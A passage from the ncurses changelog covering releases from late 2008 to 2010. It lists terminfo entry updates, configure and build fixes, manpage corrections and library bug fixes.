    + add checks in tic for inconsistent cursor-movement controls, and for
      inconsistent printer-controls.
    + fill in no-parameter forms of cursor-movement where a parameterized
      form is available -TD
    + fill in missing cursor controls where the form of the controls is
      ANSI -TD
    + fix inconsistent punctuation in form_variables manpage (patch by
      Sven Joachim).
    + add parameterized cursor-controls to linux-basic (report by Dae) -TD
    > patch by Juergen Pfeifer:
    + document how to build 32-bit libraries in README.MinGW
    + fixes to filename computation in mk-dlls.sh.in
    + use POSIX locale in mk-dlls.sh.in rather than en_US (report by Sven
      Joachim).
    + add a check in mk-dlls.sh.in to obtain the size of a pointer to
      distinguish between 32-bit and 64-bit hosts.  The result is stored
      in mingw_arch

20100925
    + add "XT" capability to entries for terminals that support both
      xterm-style mouse- and title-controls, for "screen" which
      special-cases TERM beginning with "xterm" or "rxvt" -TD
    > patch by Juergen Pfeifer:
    + use 64-Bit MinGW toolchain (recommended package from TDM, see
      README.MinGW).
    + support pthreads when using the TDM MinGW toolchain

20100918
    + regenerated html manpages.
    + minor fixes for symlinks to curs_legacy.3x and curs_slk.3x manpages.
    + add manpage for sp-funcs.
    + add sp-funcs to test/listused.sh, for documentation aids.

20100911
    + add manpages for summarizing public variables of curses-, terminfo-
      and form-libraries.
    + minor fixes to manpages for consistency (patch by Jason McIntyre).
    + modify tic's -I/-C dump to reformat acsc strings into canonical form
      (sorted, unique mapping) (cf: 971004).
    + add configure check for pthread_kill(), needed for some old
      platforms.

20100904
    + add configure option --without-tests, to suppress building test
      programs (request by Frederic L W Meunier).

20100828
    + modify nsterm, xnuppc and tek4115 to make sgr/sgr0 consistent -TD
    + add check in terminfo source-reader to provide more informative
      message when someone attempts to run tic on a compiled terminal
      description (prompted by Debian #593920).
    + note in infotocap and captoinfo manpages that they read terminal
      descriptions from text-files (Debian #593920).
    + improve acsc string for vt52, show arrow keys (patch by Benjamin
      Sittler).

20100814
    + document in manpages that "mv" functions first use wmove() to check
      the window pointer and whether the position lies within the window
      (suggested by Poul-Henning Kamp).
    + fixes to curs_color.3x, curs_kernel.3x and wresize.3x manpages (patch
      by Tim van der Molen).
    + modify configure script to transform library names for tic- and
      tinfo-libraries so that those build properly with Mac OS X shared
      library configuration.
    + modify configure script to ensure that it removes conftest.dSYM
      directory leftover on checks with Mac OS X.
    + modify configure script to cleanup after check for symbolic links.

20100807
    + correct a typo in mk-1st.awk (patch by Gabriele Balducci)
      (cf: 20100724)
    + improve configure checks for location of tic and infocmp programs
      used for installing database and for generating fallback data,
      e.g., for cross-compiling.
    + add Markus Kuhn's wcwidth function for compiling MinGW
    + add special case to CF_REGEX for cross-compiling to MinGW target.

20100731
    + modify initialization check for win32con driver to eliminate need for
      special case for TERM "unknown", using terminal database if available
      (prompted by discussion with Roumen Petrov).
    + for MinGW port, ensure that terminal driver is setup if tgetent()
      is called (patch by Roumen Petrov).
    + document tabs "-0" and "-8" options in manpage.
    + fix Debian "lintian" issues with manpages reported in

20100724
    + add a check in tic for missing set_tab if clear_all_tabs given.
    + improve use of symbolic links in makefiles by using "-f" option if
      it is supported, to eliminate temporary removal of the target
      (prompted by)
    + minor improvement to test/ncurses.c, reset color pairs in 'd' test
      after exit from 'm' main-menu command.
    + improved ncu-indent, from mawk changes, allows more than one of
      GCC_NORETURN, GCC_PRINTFLIKE and GCC_SCANFLIKE on a single line.
20100717
    + add hard-reset for rs2 to wsvt25 to help ensure that reset ends
      the alternate character set (patch by Nicholas Marriott)
    + remove tar-copy.sh and related configure/Makefile chunks, since the
      Ada95 binding is now installed using rules in Ada95/src.

20100703
    + continue integrating changes to use gnatmake project files in Ada95
    + add/use configure check to turn on project rules for Ada95/src.
    + revert the vfork change from 20100130, since it does not work.

20100626
    + continue integrating changes to use gnatmake project files in Ada95
    + old gnatmake (3.15) does not produce libraries using project-file;
      work around by adding script to generate alternate makefile.

20100619
    + continue integrating changes to use gnatmake project files in Ada95
    + add configure --with-ada-sharedlib option, for the test_make rule.
    + move Ada95-related logic into aclocal.m4, since additional checks
      will be needed to distinguish old/new implementations of gnat.

20100612
    + start integrating changes to use gnatmake project files in Ada95 tree
    + add test_make / test_clean / test_install rules in Ada95/src
    + change install-path for adainclude directory to /usr/share/ada (was
      /usr/lib/ada).
    + update Ada95/configure.
    + add mlterm+256color entry, for mlterm 3.0.0 -TD
    + modify test/configure to use macros to ensure consistent order
      of updating LIBS variable.

20100605
    + change search order of options for Solaris in CF_SHARED_OPTS, to
      work with 64-bit compiles.
    + correct quoting of assignment in CF_SHARED_OPTS case for aix
      (cf: 20081227)

20100529
    + regenerated html documentation.
    + modify test/configure to support pkg-config for checking X libraries
      used by PDCurses.
    + add/use configure macro CF_ADD_LIB to force consistency of
      assignments to $LIBS, etc.
    + fix configure script for combining --with-pthread
      and --enable-weak-symbols options.

20100522
    + correct cross-compiling configure check for CF_MKSTEMP macro, by
      adding a check cache variable set by AC_CHECK_FUNC (report by
      Pierre Labastie).
    + simplify include-dependencies of make_hash and make_keys, to reduce
      the need for setting BUILD_CPPFLAGS in cross-compiling when the
      build- and target-machines differ.
    + repair broken-linker configuration by restoring a definition of SP
      variable to curses.priv.h, and adjusting for cases where sp-funcs
      are used.
    + improve configure macro CF_AR_FLAGS, allowing ARFLAGS environment
      variable to override (prompted by report by Pablo Cazallas).

20100515
    + add configure option --enable-pthreads-eintr to control whether the
      new EINTR feature is enabled.
    + modify logic in pthread configuration to allow EINTR to interrupt
      a read operation in wgetch() (Novell #540571, patch by Werner Fink).
    + drop mkdirs.sh, use "mkdir -p".
    + add configure option --disable-libtool-version, to use the
      "-version-number" feature which was added in libtool 1.5 (report by
      Peter Haering).  The default value for the option uses the newer
      feature, which makes libraries generated using libtool compatible
      with the standard builds of ncurses.
    + updated test/configure to match configure script macros.
    + fixes for configure script from lynx changes:
      + improve CF_FIND_LINKAGE logic for the case where a function is
        found in predefined libraries.
      + revert part of change to CF_HEADER (cf: 20100424)

20100501
    + correct limit-check in wredrawln, accounting for begy/begx values
      (patch by David Benjamin).
    + fix most compiler warnings from clang.
    + amend build-fix for OpenSolaris, to ensure that a system header is
      included in curses.h before testing feature symbols, since they
      may be defined by that route.

20100424
    + fix some strict compiler warnings in ncurses library.
    + modify configure macro CF_HEADER_PATH to not look for variations in
      the predefined include directories.
    + improve configure macros CF_GCC_VERSION and CF_GCC_WARNINGS to work
      with gcc 4.x's c89 alias, which gives warning messages for cases
      where older versions would produce an error.

20100417
    + modify _nc_capcmp() to work with cancelled strings.
    + correct translation of "^" in _nc_infotocap(), used to transform
      terminfo to termcap strings
    + add configure --disable-rpath-hack, to allow disabling the feature
      which adds rpath options for libraries in unusual places.
    + improve CF_RPATH_HACK_2 by checking if the rpath option for a given
      directory was already added.
    + improve CF_RPATH_HACK_2 by using ldd to provide a standard list of
      directories (which will be ignored).

20100410
    + improve win_driver.c handling of mouse:
      + discard motion events
      + avoid calling _nc_timed_wait when there is a mouse event
      + handle 4th and "rightmost" buttons.
    + quote substitutions in CF_RPATH_HACK_2 configure macro, needed for
      cases where there are embedded blanks in the rpath option.

20100403
    + add configure check for exctags vs ctags, to work around pkgsrc.
    + simplify logic in _nc_get_screensize() to make it easier to see how
      environment variables may override system- and terminfo-values
      (prompted by discussion with Igor Bujna).
    + make debug-traces for COLOR_PAIR and PAIR_NUMBER less verbose.
    + improve handling of color-pairs embedded in attributes for the
      extended-colors configuration.
    + modify MKlib_gen.sh to build link_test with sp-funcs.
    + build-fixes for OpenSolaris aka Solaris 11, for wide-character
      configuration as well as for rpath feature in *-config scripts.

20100327
    + refactor CF_SHARED_OPTS configure macro, making CF_RPATH_HACK more
      reusable.
    + improve configure CF_REGEX, similar fixes.
    + improve configure CF_FIND_LINKAGE, adding a check between system
      (default) and explicit paths, where we can find the entrypoint in the
      given library.
    + add check if Gpm_Open() returns a -2, e.g., for "xterm".  This is
      normally suppressed but can be overridden using $NCURSES_GPM_TERMS.
      Ensure that Gpm_Close() is called in this case.

20100320
    + rename atari and st52 terminfo entries to atari-old, st52-old, use
      newer entries from FreeMiNT by Guido Flohr (from patch/report by Alan
      Hourihane).

20100313
    + modify install-rule for manpages so that *-config manpages will
      install when building with --srcdir (report by Sven Joachim).
    + modify CF_DISABLE_LEAKS configure macro so that the --enable-leaks
      option is not the same as --disable-leaks (GenToo #305889).
    + modify #define's for build-compiler to suppress cchar_t symbol from
      compile of make_hash and make_keys, improving cross-compilation of
      ncursesw (report by Bernhard Rosenkraenzer).
    + modify CF_MAN_PAGES configure macro to replace all occurrences of
      TPUT in tput.1's manpage (Debian #573597, report/analysis by Anders
      Kaseorg).

20100306
    + generate manpages for the *-config scripts, adapted from help2man
      (suggested by Sven Joachim).
    + use va_copy() in _nc_printf_string() to avoid conflicting use of
      va_list value in _nc_printf_length() (report by Wim Lewis).

20100227
    + add Ada95/configure script, to use in tar-file created by
      Ada95/make-tar.sh
    + fix typo in wresize.3x (patch by Tim van der Molen).
    + modify screen-bce.XXX entries to exclude ech, since screen's color
      model does not clear with color for that feature -TD

20100220
    + add make-tar.sh scripts to Ada95 and test subdirectories to help with
      making those separately distributable.
    + build-fix for static libraries without dlsym (Debian #556378).
    + fix a syntax error in man/form_field_opts.3x (patch by Ingo
      Schwarze).

20100213
    + add several screen-bce.XXX entries -TD

20100206
    + update mrxvt terminfo entry -TD
    + modify win_driver.c to support mouse single-clicks.
    + correct name for termlib in ncurses*-config, e.g., if it is renamed
      to provide a single file for ncurses/ncursesw libraries (patch by
      Miroslav Lichvar).

20100130
    + use vfork in test/ditto.c if available (request by Mike Frysinger).
    + miscellaneous cleanup of manpages.
    + fix typo in curs_bkgd.3x (patch by Tim van der Molen).
    + build-fix for --srcdir (patch by Miroslav Lichvar).

20100123
    + for term-driver configuration, ensure that the driver pointer is
      initialized in setupterm so that terminfo/termcap programs work.
    + amend fix for Debian #542031 to ensure that wattrset() returns only
      OK or ERR, rather than the attribute value (report by Miroslav
      Lichvar).
    + reorder WINDOWLIST to put WINDOW data after SCREEN pointer, making
      _nc_screen_of() compatible between normal/wide libraries again (patch
      by Miroslav Lichvar)
    + review/fix include-dependencies in modules files (report by Miroslav
      Lichvar).

20100116
    + modify win_driver.c to initialize acs_map for win32 console, so
      that line-drawing works.
    + modify win_driver.c to initialize TERMINAL struct so that programs
      such as test/lrtest.c and test/ncurses.c which test string
      capabilities can run.
    + modify term-driver modules to eliminate forward-reference
      declarations.
20100109
    + modify configure macro CF_XOPEN_SOURCE, etc., to use CF_ADD_CFLAGS
      consistently to add new -D's while removing duplicates.
    + modify a few configure macros to consistently put new options
      before older in the list.
    + add tiparm(), based on review of X/Open Curses Issue 7.
    + minor documentation cleanup.
    + update config.guess, config.sub from
      (caveat - its maintainer put 2010 copyright date on files dated 2009)

20100102
    + minor improvement to tic's checking of similar SGR's to allow for the
      most common case of SGR 0.
    + modify getmouse() to act as its documentation implied, returning on
      each call the preceding event until none are left.  When no more
      events remain, it will return ERR.

20091227
    + change order of lookup in progs/tput.c, looking for terminfo data
      first.  This fixes a confusion between termcap "sg" and terminfo
      "sgr" or "sgr0", originally from 990123 changes, but exposed by
      20091114 fixes for hashing.  With this change, only "dl" and "ed" are
      ambiguous (Mandriva #56272).

20091226
    + add bterm terminfo entry, based on bogl 0.1.18 -TD
    + minor fix to rxvt+pcfkeys terminfo entry -TD
    + build-fixes for Ada95 tree for gnat 4.4 "style".

20091219
    + remove old check in mvderwin() which prevented moving a derived
      window whose origin happened to coincide with its parent's origin
      (report by Katarina Machalkova).
    + improve test/ncurses.c to put mouse droppings in the proper window.
    + update minix terminfo entry -TD
    + add bw (auto-left-margin) to nsterm* entries (Benjamin Sittler)

20091212
    + correct transfer of multicolumn characters in multirow
      field_buffer(), which stopped at the end of the first row due to
      filling of unused entries in a cchar_t array with nulls.
    + updated nsterm* entries (Benjamin Sittler, Emanuele Giaquinta)
    + modify _nc_viscbuf2() and _tracecchar_t2() to show wide-character
      nulls.
    + use strdup() in set_menu_mark(), restore .marklen struct member on
      failure.
    + eliminate clause 3 from the UCB copyrights in read_termcap.c and
      tset.c per
      (patch by Nicholas Marriott).
    + replace a malloc in tic.c with strdup, checking for failure (patch by
      Nicholas Marriott).
    + update config.guess, config.sub from

20091205
    + correct layout of working window used to extract data in
      wide-character configured by set_field_buffer (patch by Rafael
      Garrido Fernandez)
    + improve some limit-checks related to filename length in reading and
      writing terminfo entries.
    + ensure that filename is always filled in when attempting to read
      a terminfo entry, so that infocmp can report the filename (patch
      by Nicholas Marriott).

20091128
    + modify mk-1st.awk to allow tinfo library to be built when term-driver
      is enabled.
    + add error-check to configure script to ensure that sp-funcs is
      enabled if term-driver is, since some internal interfaces rely upon
      this.

20091121
    + fix case where progs/tput is used while sp-funcs is configured; this
      requires save/restore of out-character function from _nc_prescreen
      rather than the SCREEN structure (report by Charles Wilson).
    + fix typo in man/curs_trace.3x which caused incorrect symbolic links
    + improved configure macros CF_GCC_ATTRIBUTES, CF_PROG_LINT.

20091114
    + updated man/curs_trace.3x
    + limit hashing for termcap-names to 2-characters (Ubuntu #481740).
    + change a variable name in lib_newwin.c to make it clearer which
      value is being freed on error (patch by Nicholas Marriott).
20091107
    + improve test/ncurses.c color-cycling test by reusing attribute-
      and color-cycling logic from the video-attributes screen.
    + add ifdef'd with NCURSES_INTEROP_FUNCS experimental bindings in form
      library which help make it compatible with interop applications
      (patch by Juergen Pfeifer).
    + add configure option --enable-interop, for integrating changes
      for generic/interop support to form-library by Juergen Pfeifer

20091031
    + modify use of $CC environment variable which is defined by X/Open
      as a curses feature, to ignore it if it is not a single character
      (prompted by discussion with Benjamin C W Sittler).
    + add START_TRACE in slk_init
    + fix a regression in _nc_ripoffline which made test/ncurses.c not show
      soft-keys, broken in 20090927 merging.
    + change initialization of "hidden" flag for soft-keys from true to
      false, broken in 20090704 merging (Ubuntu #464274).
    + update nsterm entries (patch by Benjamin C W Sittler, prompted by
      discussion with Fabian Groffen in GenToo #206201).
    + add test/xterm-256color.dat

20091024
    + quiet some pedantic gcc warnings.
    + modify _nc_wgetch() to check for a -1 in the fifo, e.g., after a
      SIGWINCH, and discard that value, to avoid confusing application
      (patch by Eygene Ryabinkin, FreeBSD bin/136223).

20091017
    + modify handling of $PKG_CONFIG_LIBDIR to use only the first item in
      a possibly colon-separated list (Debian #550716).

20091010
    + supply a null-terminator to buffer in _nc_viswibuf().
    + fix a sign-extension bug in unget_wch() (report by Mike Gran).
    + minor fixes to error-returns in default function for tputs, as well
      as in lib_screen.c

20091003
    + add WACS_xxx definitions to wide-character configuration for thick-
      and double-lines (discussion with Slava Zanko).
    + remove unnecessary kcan assignment to ^C from putty (Sven Joachim)
    + add ccc and initc capabilities to xterm-16color -TD
    > patch by Benjamin C W Sittler:
    + add linux-16color
    + correct initc capability of linux-c-nc end-of-range
    + similar change for dg+ccc and dgunix+ccc

20090927
    + move leak-checking for comp_captab.c into _nc_leaks_tinfo() since
      that module since 20090711 is in libtinfo.
    + add configure option --enable-term-driver, to allow compiling with
      terminal-driver.  That is used in MinGW port, and (being somewhat
      more complicated) is an experimental alternative to the conventional
      termlib internals.  Currently, it requires the sp-funcs feature to
      be enabled.
    + completed integrating "sp-funcs" by Juergen Pfeifer in ncurses
      library (some work remains for forms library).

20090919
    + document return code from define_key (report by Mike Gran).
    + make some symbolic links in the terminfo directory-tree shorter
      (patch by Daniel Jacobowitz, forwarded by Sven Joachim).
    + fix some groff warnings in terminfo.5, etc., from recent Debian
      changes.
    + change ncv and op capabilities in sun-color terminfo entry to match
      Sun's entry for this (report by Laszlo Peter).
    + improve interix smso terminfo capability by using reverse rather than
      bold (report by Kristof Zelechovski).

20090912
    + add some test programs (and make these use the same special keys
      by sharing linedata.h functions):
        test/test_addstr.c
        test/test_addwstr.c
        test/test_addchstr.c
        test/test_add_wchstr.c
    + correct internal _nc_insert_ch() to use _nc_insert_wch() when
      inserting wide characters, since the wins_wch() function that it used
      did not update the cursor position (report by Ciprian Craciun).

20090906
    + fix typo s/is_timeout/is_notimeout/ which made "man is_notimeout" not
      work.
	+ add null-pointer checks to other opaque-functions.
	+ add is_pad() and is_subwin() functions for opaque access to WINDOW
	  (discussion with Mark Dickinson).
	+ correct merge to lib_newterm.c, which broke when sp-funcs was
	  enabled.

20090905
	+ build-fix for building outside source-tree (report by Sven Joachim).
	+ fix Debian lintian warning for man/tabs.1 by making section number
	  agree with file-suffix (report by Sven Joachim).
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090829
	+ workaround for bug in g++ 4.1-4.4 warnings for wattrset() macro on
	  amd64 (Debian #542031).
	+ fix typo in curs_mouse.3x (Debian #429198).

20090822
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090815
	+ correct use of terminfo capabilities for initializing soft-keys,
	  broken in 20090509 merging.
	+ modify wgetch() to ensure it checks SIGWINCH when it gets an error
	  in non-blocking mode (patch by Clemens Ladisch).
	+ use PATH_SEPARATOR symbol when substituting into run_tic.sh, to
	  help with builds on non-Unix platforms such as OS/2 EMX.
	+ modify scripting for misc/run_tic.sh to test configure script's
	  $cross_compiling variable directly rather than comparing host/build
	  compiler names (prompted by comment in GenToo #249363).
	+ fix configure script option --with-database, which was coded as an
	  enable-type switch.
	+ build-fixes for --srcdir (report by Frederic L W Meunier).

20090808
	+ separate _nc_find_entry() and _nc_find_type_entry() from
	  implementation details of hash function.

20090803
	+ add tabs.1 to man/man_db.renames
	+ modify lib_addch.c to compensate for removal of wide-character test
	  from unctrl() in 20090704 (Debian #539735).

20090801
	+ improve discussion in INSTALL for use of system's tic/infocmp for
	  cross-compiling and building fallbacks.
	+ modify test/demo_termcap.c to correspond better to options in
	  test/demo_terminfo.c
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).
	+ fix logic for 'V' in test/ncurses.c tests f/F.

20090728
	+ correct logic in tigetnum(), which caused tput program to treat all
	  string capabilities as numeric (report by Rajeev V Pillai,
	  cf: 20090711).

20090725
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090718
	+ fix a null-pointer check in _nc_format_slks() in lib_slk.c, from
	  20070704 changes.
	+ modify _nc_find_type_entry() to use hashing.
	+ make CCHARW_MAX value configurable, noting that changing this would
	  change the size of cchar_t, and would be ABI-incompatible.
	+ modify test-programs, e.g., test/view.c, to address subtle
	  differences between Tru64/Solaris and HPUX/AIX getcchar() return
	  values.
	+ modify length returned by getcchar() to count the trailing null
	  which is documented in X/Open (cf: 20020427).
	+ fixes for test programs to build/work on HPUX and AIX, etc.

20090711
	+ improve performance of tigetstr, etc., by using hashing code from tic.
	+ minor fixes for memory-leak checking.
	+ add test/demo_terminfo, for comparison with demo_termcap

20090704
	+ remove wide-character checks from unctrl() (patch by Clemens Ladisch).
	+ revise wadd_wch() and wecho_wchar() to eliminate dependency on
	  unctrl().
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090627
	+ update llib-lncurses[wt] to use sp-funcs.
	+ various code-fixes to build/work with --disable-macros configure
	  option.
	+ add several new files from Juergen Pfeifer which will be used when
	  integration of "sp-funcs" is complete.  This includes a port to
	  MinGW.

20090613
	+ move definition for NCURSES_WRAPPED_VAR back to ncurses_dll.h, to
	  make includes of term.h without curses.h work (report by "Nix").
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090607
	+ fix a regression in lib_tputs.c, from ongoing merges.

20090606
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090530
	+ fix an infinite recursion when adding a legacy-coding 8-bit value
	  using insch() (report by Clemens Ladisch).
	+ free home-terminfo string in del_curterm() (patch by Dan Weber).
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090523
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090516
	+ work around antique BSD game's manipulation of stdscr, etc., versus
	  SCREEN's copy of the pointer (Debian #528411).
	+ add a cast to wattrset macro to avoid compiler warning when comparing
	  its result against ERR (adapted from patch by Matt Kraii, Debian
	  #528374).

20090510
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090502
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).
	+ add vwmterm terminfo entry (patch by Bryan Christ).

20090425
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090419
	+ build fix for _nc_free_and_exit() change in 20090418 (report by
	  Christian Ebert).

20090418
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090411
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).
	  This change finishes merging for menu and panel libraries, does
	  part of the form library.

20090404
	+ suppress configure check for static/dynamic linker flags for gcc on
	  Darwin (report by Nelson Beebe).

20090328
	+ extend ansi.sys pfkey capability from kf1-kf10 to kf1-kf48, moving
	  function key definitions from emx-base for consistency -TD
	+ correct missing final 'p' in pfkey capability of ansi.sys-old (report
	  by Kalle Olavi Niemitalo).
	+ improve test/ncurses.c 'F' test, show combining characters in color.
	+ quiet a false report by cppcheck in c++/cursesw.cc by eliminating
	  a temporary variable.
	+ use _nc_doalloc() rather than realloc() in a few places in ncurses
	  library to avoid leak in out-of-memory condition (reports by William
	  Egert and Martin Ettl based on cppcheck tool).
	+ add --with-ncurses-wrap-prefix option to test/configure (discussion
	  with Charles Wilson).
	+ use ncurses*-config scripts if available for test/configure.
	+ update test/aclocal.m4 and test/configure
	> patches by Charles Wilson:
	+ modify CF_WITH_LIBTOOL configure check to allow unreleased libtool
	  version numbers (e.g. which include alphabetic chars, as well as
	  digits, after the final '.').
	+ improve use of -no-undefined option for libtool by setting an
	  intermediate variable LT_UNDEF in the configure script, and then
	  using that in the libtool link-commands.
	+ fix a missing use of NCURSES_PUBLIC_VAR() in tinfo/MKcodes.awk
	  from 2009031 changes.
	+ improve mk-1st.awk script by writing separate cases for the
	  LIBTOOL_LINK command, depending on which library (ncurses, ticlib,
	  termlib) is to be linked.
	+ modify configure.in to allow broken-linker configurations, not just
	  enable-reentrant, to set public wrap prefix.

20090321
	+ add TICS_LIST and SHLIB_LIST to allow libtool 2.2.6 on Cygwin to
	  build with tic and term libraries (patch by Charles Wilson).
	+ add -no-undefined option to libtool for Cygwin, MinGW, U/Win and AIX
	  (report by Charles Wilson).
	+ fix definition for c++/Makefile.in's SHLIB_LIST, which did not list
	  the form, menu or panel libraries (patch by Charles Wilson).
	+ add configure option --with-wrap-prefix to allow setting the prefix
	  for functions used to wrap global variables to something other than
	  "_nc_" (discussion with Charles Wilson).

20090314
	+ modify scripts to generate ncurses*-config and pc-files to add
	  dependency for tinfo library (patch by Charles Wilson).
	+ improve comparison of program-names when checking for linked flavors
	  such as "reset" by ignoring the executable suffix (reports by Charles
	  Wilson, Samuel Thibault and Cedric Bretaudeau on Cygwin mailing
	  list).
	+ suppress configure check for static/dynamic linker flags for gcc on
	  Solaris 10, since gcc is confused by absence of static libc, and
	  does not switch back to dynamic mode before finishing the libraries
	  (reports by Joel Bertrand, Alan Pae).
	+ minor fixes to Intel compiler warning checks in configure script.
	+ modify _nc_leaks_tinfo() so leak-checking in test/railroad.c works.
	+ modify set_curterm() to make broken-linker configuration work with
	  changes from 20090228 (report by Charles Wilson).

20090228
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).
	+ modify declaration of cur_term when broken-linker is used, but
	  enable-reentrant is not, to match pre-5.7 (report by Charles Wilson).

20090221
	+ continue integrating "sp-funcs" by Juergen Pfeifer (incomplete).

20090214
	+ add configure script --enable-sp-funcs to enable the new set of
	  extended functions.
	+ start integrating patches by Juergen Pfeifer:
	+ add extended functions which specify the SCREEN pointer for several
	  curses functions which use the global SP (these are incomplete;
	  some internals work is needed to complete these).
	+ add special cases to configure script for MinGW port.

20090207
	+ update several configure macros from lynx changes
	+ append (not prepend) to CFLAGS/CPPFLAGS
	+ change variable from PATHSEP to PATH_SEPARATOR
	+ improve install-rules for pc-files (patch by Miroslav Lichvar).
	+ make it work with $DESTDIR
	+ create the pkg-config library directory if needed.

20090124
	+ modify init_pair() to allow caller to create extra color pairs beyond
	  the color_pairs limit, which use default colors (request by Emanuele
	  Giaquinta).
	+ add misc/terminfo.tmp and misc/*.pc to "sources" rule.
	+ fix typo "==" where "=" is needed in ncurses-config.in and
	  gen-pkgconfig.in files (Debian #512161).

20090117
	+ add -shared option to MK_SHARED_LIB when -Bsharable is used, for
	  *BSD's, without which "main" might be one of the shared library's
	  dependencies (report/analysis by Ken Dickey).
	+ modify waddch_literal(), updating line-pointer after a multicolumn
	  character is found to not fit on the current row, and wrapping is
	  done.  Since the line-pointer was not updated, the wrapped
	  multicolumn character was written to the beginning of the current row
	  (cf: 20041023, reported by "Nick" regarding problem with ncmpc).

20090110
	+ add screen.Eterm terminfo entry (GenToo #124887) -TD
	+ modify adacurses-config to look for ".ali" files in the adalib
	  directory.
	+ correct install for Ada95, which omitted libAdaCurses.a used in
	  adacurses-config
	+ change install for adacurses-config to provide additional flavors
	  such as adacursesw-config, for ncursesw (GenToo #167849).

20090105
	+ remove undeveloped feature in ncurses-config.in for setting
	  prefix variable.
	+ recent change to ncurses-config.in did not take into account the
	  --disable-overwrite option, which sets $includedir to the
	  subdirectory and using just that for a -I option does not work - fix
	  (report by Frederic L W Meunier).

20090104
	+ modify gen-pkgconfig.in to eliminate a dependency on rpath when
	  deciding whether to add $LIBS to --libs output; that should be shown
	  for the ncurses and tinfo libraries without taking rpath into
	  account.
	+ fix an overlooked change from $AR_OPTS to $ARFLAGS in mk-1st.awk,
	  used in static libraries (report by Marty Jack).

20090103
	+ add a configure-time check to pick a suitable value for
	  CC_SHARED_OPTS for Solaris (report by Dagobert Michelsen).
	+ add configure --with-pkg-config and --enable-pc-files options, along
	  with misc/gen-pkgconfig.in which can be used to generate ".pc" files
	  for pkg-config (request by Jan Engelhardt).
	+ use $includedir symbol in misc/ncurses-config.in, add --includedir
	  option.
	+ change makefiles to use $ARFLAGS rather than $AR_OPTS, provide a
	  configure check to detect whether a "-" is needed before "ar"
	  options.
	+ update config.guess, config.sub from

20081227
	+ modify mk-1st.awk to work with extra categories for tinfo library.
	+ modify configure script to allow building shared libraries with gcc
	  on AIX 5 or 6 (adapted from patch by Lital Natan).

20081220
	+ modify to omit the opaque-functions from lib_gen.o when
	  --disable-ext-funcs is used.
	+ add test/clip_printw.c to illustrate how to use printw without
	  wrapping.
	+ modify ncurses 'F' test to demo wborder_set() with colored lines.
	+ modify ncurses 'f' test to demo wborder() with colored lines.

20081213
	+ add check for failure to open hashed-database needed for db4.6
	  (GenToo #245370).
	+ corrected --without-manpages option; previous change only suppressed
	  the auxiliary rules install.man and uninstall.man
	+ add case for FreeMINT to configure macro CF_XOPEN_SOURCE (patch from
	  GenToo #250454).
	+ fixes from NetBSD port at
		patch-ac (build-fix for DragonFly)
		patch-ae (use INSTALL_SCRIPT for installing misc/ncurses*-config).
	+ improve configure script macros CF_HEADER_PATH and CF_LIBRARY_PATH
	  by adding CFLAGS, CPPFLAGS and LDFLAGS, LIBS values to the
	  search-lists.
	+ correct title string for keybound manpage (patch by Frederic Culot,
	  OpenBSD documentation/6019).

20081206
	+ move del_curterm() call from _nc_freeall() to _nc_leaks_tinfo() to
	  work for progs/clear, progs/tabs, etc.
	+ correct buffer-size after internal resizing of wide-character
	  set_field_buffer(), broken in 20081018 changes (report by Mike Gran).
	+ add "-i" option to test/filter.c to tell it to use initscr() rather
	  than newterm(), to investigate report on comp.unix.programmer that
	  ncurses would clear the screen in that case (it does not - the issue
	  was xterm's alternate screen feature).
	+ add check in mouse-driver to disable connection if GPM returns a
	  zero, indicating that the connection is closed (Debian #506717,
	  adapted from patch by Samuel Thibault).

20081129
	+ improve a workaround in adding wide-characters, when a control
	  character is found.  The library (cf: 20040207) uses unctrl() to
	  obtain a printable version of the control character, but was not
	  passing color or video attributes.
	+ improve test/ncurses.c 'a' test, using unctrl() more consistently to
	  display meta-characters.
	+ turn on _XOPEN_CURSES definition in curses.h
	+ add eterm-color entry (report by Vincent Lefevre) -TD
	+ correct use of key_name() in test/ncurses.c 'A' test, which only
	  displays wide-characters, not key-codes since 20070612 (report by
	  Ricardo Cantu).

20081122
	+ change _nc_has_mouse() to has_mouse(), reflect its use in C++ and
	  Ada95 (patch by Juergen Pfeifer).
	+ document in TO-DO an issue with Cygwin's package for GNAT (report
	  by Mike Dennison).
	+ improve error-checking of command-line options in "tabs" program.

20081115
	+ change several terminfo entries to make consistent use of ANSI
	  clear-all-tabs -TD
	+ add "tabs" program (prompted by Debian #502260).
	+ add configure --without-manpages option (request by Mike Frysinger).

20081102	5.7 release for upload to

20081025
	+ add a manpage to discuss memory leaks.
	+ add support for shared libraries for QNX (other than libtool, which
	  does not work well on that platform).
	+ build-fix for QNX C++ binding.

20081018
	+ build-fixes for OS/2 EMX.
	+ modify form library to accept control characters such as newline
	  in set_field_buffer(), which is compatible with Solaris (report by
	  Nit Khair).
	+ modify configure script to assume --without-hashed-db when
	  --disable-database is used.
	+ add "-e" option in ncurses/Makefile.in when generating source-files
	  to force earlier exit if the build environment fails unexpectedly
	  (prompted by patch by Adrian Bunk).
	+ change configure script to use CF_UTF8_LIB, improved variant of
	  CF_LIBUTF8.

20081012
	+ add teraterm4.59 terminfo entry, use that as primary teraterm entry,
	  rename original to teraterm2.3 -TD
	+ update "gnome" terminfo to 2.22.3 -TD
	+ update "konsole" terminfo to 1.6.6, needs today's fix for tic -TD
	+ add "aterm" terminfo -TD
	+ add "linux2.6.26" terminfo -TD
	+ add logic to tic for cancelling strings in user-defined capabilities,
	  overlooked til now.

20081011
	+ regenerated html documentation.
	+ add -m and -s options to test/keynames.c and test/key_names.c to test
	  the meta() function with keyname() or key_name(), respectively.
	+ correct return value of key_name() on error; it is null.
	+ document some unresolved issues for rpath and pthreads in TO-DO.
